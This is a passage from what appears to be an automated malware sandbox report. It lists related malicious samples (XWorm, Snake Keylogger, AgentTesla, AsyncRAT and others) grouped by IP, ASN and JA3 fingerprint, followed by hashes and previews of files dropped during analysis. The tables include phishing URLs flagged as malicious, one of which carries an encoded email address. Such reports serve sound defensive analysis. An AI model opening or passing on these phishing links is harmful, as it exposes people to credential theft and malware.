api.telegram.org	vUlh7stUHJ.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Fiyat Teklifi_2038900001-MOKAPTO-06122024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO54782322024.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	vUlh7stUHJ.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Fiyat Teklifi_2038900001-MOKAPTO-06122024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Yn13dTQdcW.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	PO54782322024.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	BQ_PO#385995.exe	Get hash	malicious	RedLine, Snake Keylogger, VIP Keylogger, XWorm	Browse	149.154.167.220
TUT-ASUS	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	CPym6H29BR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	208.95.112.1
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	208.95.112.1
SALSGIVERUS	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	jSm8N1jXbk.exe	Get hash	malicious	S400 RAT	Browse	147.185.221.23
	mpsl.elf	Get hash	malicious	Unknown	Browse	147.184.149.5
	i686.elf	Get hash	malicious	Unknown	Browse	147.168.36.17
	fUXttuyA0n.exe	Get hash	malicious	SheetRat	Browse	147.185.221.19
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse	147.185.221.24
	msedge.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	x9XhRITucw.exe	Get hash	malicious	XWorm	Browse	147.185.221.20

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.220
	BGM LAW GROUP - RFP 2024.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	149.154.167.220
	Shipping Documents 72908672134.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://app.droplet.io/form/K47rYN	Get hash	malicious	Unknown	Browse	149.154.167.220
	QUOTE_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	QUOTE_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	vUlh7stUHJ.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	lg1wwLsmCX.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4920646791623028
Encrypted:	false
SSDEEP:	1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaO:cJhXC9lHmutpJyiRDeJ/aUKrDgnmw
MD5:	11C794AFB0C7F6969E1274E7FD12B125
SHA1:	FBC1F70C0F685E3D8CA2C69E10ACDF851DB3B7B7
SHA-256:	ADE39C0F0875647C4A8CD6B2803DCF49A8FE10F408DDB6BF318E07A5B68E2692
SHA-512:	F5ED681AD42EE535AB38FC4E9D67E1D94A48579E8FF0B0EFBA952BF0F9A5F45840064E6F4BE633B67A5C71215D0DDBCCDDF881EE758A9A4EE155C2CE2D62D7F5
Malicious:	false
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xf5644f26, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7216819726671622
Encrypted:	false
SSDEEP:	1536:TSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:TazaNvFv8V2UW/DLzN/w4wZi
MD5:	FC04946AA8B17612FB6180E0A26632E1
SHA1:	D9B412A4141078F1F6140A365DAE0990079B41CE
SHA-256:	153CFA1DE222E0E491B67881D220A4EE11E68B42E55950885EFF7B3D21F6B16C
SHA-512:	BD731928D940D41FA38415420246EB1855BD7A3BAC296A49D2E4AB85FA43E551199CD33F6A18ECB064326764D53224D3EDFCE3AEBB935158B9DD52723699E4A7
Malicious:	false
Preview:	.dO&... ...............X\...;...{......................p.D..........{}../...\|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...................................D.P./...\|....................8../...\|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07932592699955551
Encrypted:	false
SSDEEP:	3:o/8YeSrZpZew/fgsCrZClW/tdhrcllill+SHY/Xl+/rQLve:oUzuZTewfgs3GDhrUIAS4M
MD5:	17B41D984937961D1FB4C27D712126E5
SHA1:	0606CD2D453A1FD5ADAD87790D48FCC5FBFBA2C4
SHA-256:	8CE2C48D1A801DA1A02A0BCEEB283095A9C5B9B28F37C1717C5A033E98ED4783
SHA-512:	8EDBBFBA4663349D3F7F73B9AEF046B204EA2EB99BEE3B314790A506FF3027D7E28FA646483F4DCA6E86EAF698E980F7B58708DFB62E14185318EA505B9FEA8A
Malicious:	false
Preview:	.........................................;...{.../...\|.......{}..............{}......{}.vv_Q.....{}...................8../...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Systen User.log

Download File

Process:	C:\Users\user\AppData\Roaming\Systen User
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ozgpPwVAu1.exe.log

Download File

Process:	C:\Users\user\Desktop\ozgpPwVAu1.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\adawsfaefasfasfg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	116
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsrlvVjFYJKXzovNsrPT4yVjFYJKXzovLvAFYJKXzovX:EFYJKDoWrDFYJKDoWrP0EFYJKDoMFYJp
MD5:	9E590971F66ED2759CDDC1B055DDAAEB
SHA1:	F78096761AF7A5E7B3D9873106C95D3049E2BF65
SHA-256:	D79A8A9D1E13BCFF676485C2CD1332090468C5806034D61782ECFE55F457ADC4
SHA-512:	548B1D02D6903C02C48A8C4094993A60458D49ECFD87F7A292B70D06FF056DFB5112F385667F0B1DB8FC80F5A0CA2E8AEF46E0C59E9D6F24D494F0EAE61AEB1B
Malicious:	false
Preview:	....### explorer ###..[WIN]....### explorer ###..[WIN]rr[WIN][WIN]....### explorer ###..r....### explorer ###..r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_254ljbms.2w3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ikv2ul0.5tx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zdeoaxa.luw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_an50pwnv.5rb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ba22id0s.hqa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgqmpqmq.1pj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_da1ax5cf.a2m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwad2lii.w3f.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enebrt5t.wgz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etso4lwb.git.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5w12v12.2tz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jf2z4ayl.o3k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
